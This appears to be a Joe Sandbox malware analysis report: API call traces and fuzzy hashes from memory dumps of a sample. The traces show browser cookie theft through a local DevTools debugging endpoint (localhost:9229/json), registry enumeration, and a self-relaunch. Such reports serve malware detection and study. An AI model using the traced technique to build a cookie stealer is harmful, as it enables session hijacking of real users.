                          APIs
                            • Part of subcall function 007D90C0: InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D90DF
                            • Part of subcall function 007D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007D90FC
                            • Part of subcall function 007D90C0: InternetCloseHandle.WININET(00000000), ref: 007D9109
                          • strlen.MSVCRT ref: 007D92E1
                          • strlen.MSVCRT ref: 007D92FA
                            • Part of subcall function 007D8980: std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                          • strlen.MSVCRT ref: 007D9399
                          • strlen.MSVCRT ref: 007D93E6
                          • lstrcat.KERNEL32(?,cookies), ref: 007D9547
                          • lstrcat.KERNEL32(?,00801794), ref: 007D9559
                          • lstrcat.KERNEL32(?,?), ref: 007D956A
                          • lstrcat.KERNEL32(?,00804B98), ref: 007D957C
                          • lstrcat.KERNEL32(?,?), ref: 007D958D
                          • lstrcat.KERNEL32(?,.txt), ref: 007D959F
                          • lstrlen.KERNEL32(?), ref: 007D95B6
                          • lstrlen.KERNEL32(?), ref: 007D95DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D9614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: c29b45eaeaa5001dfc167347bd2d76c3cf471d88be1367733681d274174d22c9
                          • Instruction ID: 36159ba2a853b72dc4bd382d28350bfacc78d4872effb7a16da26502cb733ccf
                          • Opcode Fuzzy Hash: c29b45eaeaa5001dfc167347bd2d76c3cf471d88be1367733681d274174d22c9
                          • Instruction Fuzzy Hash: 2BE11A71E10218DBDF54DFA8D884ADEBBB5FF58310F10846AE609A7342DB389E46CB51
                          APIs
                          • memset.MSVCRT ref: 007ED9A1
                          • memset.MSVCRT ref: 007ED9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007ED9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 007EDA1C
                          • lstrcat.KERNEL32(?,0125E2B0), ref: 007EDA36
                          • lstrcat.KERNEL32(?,?), ref: 007EDA4A
                          • lstrcat.KERNEL32(?,0125D6A0), ref: 007EDA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EDA95
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EDAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: ee1da681a5e7df1b754f78611655a4c04c7cf67fe4bd2389e6a82db77f3c81bb
                          • Instruction ID: ef82cf19c185fb66be38b3f3f877553c1360426a5992fcf07ad476a708f51ee5
                          • Opcode Fuzzy Hash: ee1da681a5e7df1b754f78611655a4c04c7cf67fe4bd2389e6a82db77f3c81bb
                          • Instruction Fuzzy Hash: 0DB1C2B19002599FDB20EFB4DC889EE77B9EF8C300F148565E946E7251DA389E46CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DB330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DB3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB3D9
                          • lstrlen.KERNEL32(00804C50), ref: 007DB450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB474
                          • lstrcat.KERNEL32(00000000,00804C50), ref: 007DB480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB4A9
                          • lstrlen.KERNEL32(00000000), ref: 007DB52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DB55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB587
                          • lstrlen.KERNEL32(00804AD4), ref: 007DB5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB622
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007DB62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB65E
                          • lstrlen.KERNEL32(?), ref: 007DB767
                          • lstrlen.KERNEL32(?), ref: 007DB776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 5420db64d89e0aa666d2a5fd67ac8d75b154684300e0104fda1286bd11e10561
                          • Instruction ID: ebfa24e2b08cc912beb39c66bd8459f812f85c39eb68176eaf25802c24d1eb92
                          • Opcode Fuzzy Hash: 5420db64d89e0aa666d2a5fd67ac8d75b154684300e0104fda1286bd11e10561
                          • Instruction Fuzzy Hash: 09025F70A01206CFCB25DF65D998B6AB7F5EF44314F1A816AE8099B362D739DC43CB90
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • RegOpenKeyExA.ADVAPI32(?,0125B6D8,00000000,00020019,?), ref: 007F37BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007F37F7
                          • wsprintfA.USER32 ref: 007F3822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 007F3840
                          • RegCloseKey.ADVAPI32(?), ref: 007F384E
                          • RegCloseKey.ADVAPI32(?), ref: 007F3858
                          • RegQueryValueExA.ADVAPI32(?,0125E208,00000000,000F003F,?,?), ref: 007F38A1
                          • lstrlen.KERNEL32(?), ref: 007F38B6
                          • RegQueryValueExA.ADVAPI32(?,0125E040,00000000,000F003F,?,00000400), ref: 007F3927
                          • RegCloseKey.ADVAPI32(?), ref: 007F3972
                          • RegCloseKey.ADVAPI32(?), ref: 007F3989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 3b8ec6e35e9e962fb16b3c88aac9aa22e72756664f9e8bb2b7bf99e51e9e8fd3
                          • Instruction ID: 563ce0e01fba37272c66a161e111f5b74713f73d7a8a4f9499d67f87d459f2f6
                          • Opcode Fuzzy Hash: 3b8ec6e35e9e962fb16b3c88aac9aa22e72756664f9e8bb2b7bf99e51e9e8fd3
                          • Instruction Fuzzy Hash: 7F917CB290020DDFCB10DFA4DD849AEB7B9FB48310F148569E609AB351D779AE46CB90
                          APIs
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D90DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007D90FC
                          • InternetCloseHandle.WININET(00000000), ref: 007D9109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 007D9166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 007D9197
                          • InternetCloseHandle.WININET(00000000), ref: 007D91A2
                          • InternetCloseHandle.WININET(00000000), ref: 007D91A9
                          • strlen.MSVCRT ref: 007D91BA
                          • strlen.MSVCRT ref: 007D91ED
                          • strlen.MSVCRT ref: 007D922E
                          • strlen.MSVCRT ref: 007D924C
                            • Part of subcall function 007D8980: std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: a3883693f373c43ef943b957fc243e4a7951df95704c3c4ff90a061b6fe23f32
                          • Instruction ID: dbe4201d1b070da3ca3814b9b2d3ca1cf42018d904ef5d5ba8957ee5f1c32213
                          • Opcode Fuzzy Hash: a3883693f373c43ef943b957fc243e4a7951df95704c3c4ff90a061b6fe23f32
                          • Instruction Fuzzy Hash: 5551B571640209ABD710DBE8DC45BEEF7F9EF48720F14006AF604E3381DBB9AA458765
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007F16A1
                          • lstrcpy.KERNEL32(00000000,0124B8B0), ref: 007F16CC
                          • lstrlen.KERNEL32(?), ref: 007F16D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F16F6
                          • lstrcat.KERNEL32(00000000,?), ref: 007F1704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F172A
                          • lstrlen.KERNEL32(0125A350), ref: 007F173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1762
                          • lstrcat.KERNEL32(00000000,0125A350), ref: 007F176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1792
                          • ShellExecuteEx.SHELL32(?), ref: 007F17CD
                          • ExitProcess.KERNEL32 ref: 007F1803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 10de5bf8c071e1d07c1f0a1d2050b25d8ab325c059e9d8a8ec9dfc15ee327064
                          • Instruction ID: 2e485cbbf00245001186d645b9e3311e7936136f140e99b757f1572ea769a12e
                          • Opcode Fuzzy Hash: 10de5bf8c071e1d07c1f0a1d2050b25d8ab325c059e9d8a8ec9dfc15ee327064
                          • Instruction Fuzzy Hash: 50514271A1121EDBDB11EFA4DD84AAEB7F9AF58300F444125E905E3352DB38AE078B94
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007EF026
                          • lstrlen.KERNEL32(00000000), ref: 007EF035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 007EF053
                          • StrStrA.SHLWAPI(00000000,?), ref: 007EF081
                          • lstrlen.KERNEL32(?), ref: 007EF094
                          • lstrlen.KERNEL32(00000000), ref: 007EF0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EF0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EF13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: e39e9134c6417223f8ea6554cf26ac7049584d054ab20c99df11f56308561f64
                          • Instruction ID: 260209f5f3ffeee652febe0634cff286bcc8c54a0a8d1ae6aa86cd79bc98cc0c
                          • Opcode Fuzzy Hash: e39e9134c6417223f8ea6554cf26ac7049584d054ab20c99df11f56308561f64
                          • Instruction Fuzzy Hash: 1D518D71A11259DBCB21EF75DC49A6A77B4EF98310F049169EC49EB353DA38EC038B90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(012590B8,00A09BD8,0000FFFF), ref: 007DA026
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DA053
                          • lstrlen.KERNEL32(00A09BD8), ref: 007DA060
                          • lstrcpy.KERNEL32(00000000,00A09BD8), ref: 007DA08A
                          • lstrlen.KERNEL32(00804C4C), ref: 007DA095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA0B2
                          • lstrcat.KERNEL32(00000000,00804C4C), ref: 007DA0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DA0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA114
                          • SetEnvironmentVariableA.KERNEL32(012590B8,00000000), ref: 007DA12F
                          • LoadLibraryA.KERNEL32(0125DE90), ref: 007DA143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 6e7896efcc4e924684c296b0223d7c4af8c02dedd0946845662ae282daa8d36a
                          • Instruction ID: da83e8501dbbdddf076d57d704f7ad1f44ede508bf119ceba71b711450cc5135
                          • Opcode Fuzzy Hash: 6e7896efcc4e924684c296b0223d7c4af8c02dedd0946845662ae282daa8d36a
                          • Instruction Fuzzy Hash: 2791B131600A18AFD721DFA4DC88A6637B6FB94704F44412AE94587362EFBDDC43CB92
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EC8A2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EC8D1
                          • lstrlen.KERNEL32(00000000), ref: 007EC8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EC932
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007EC943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
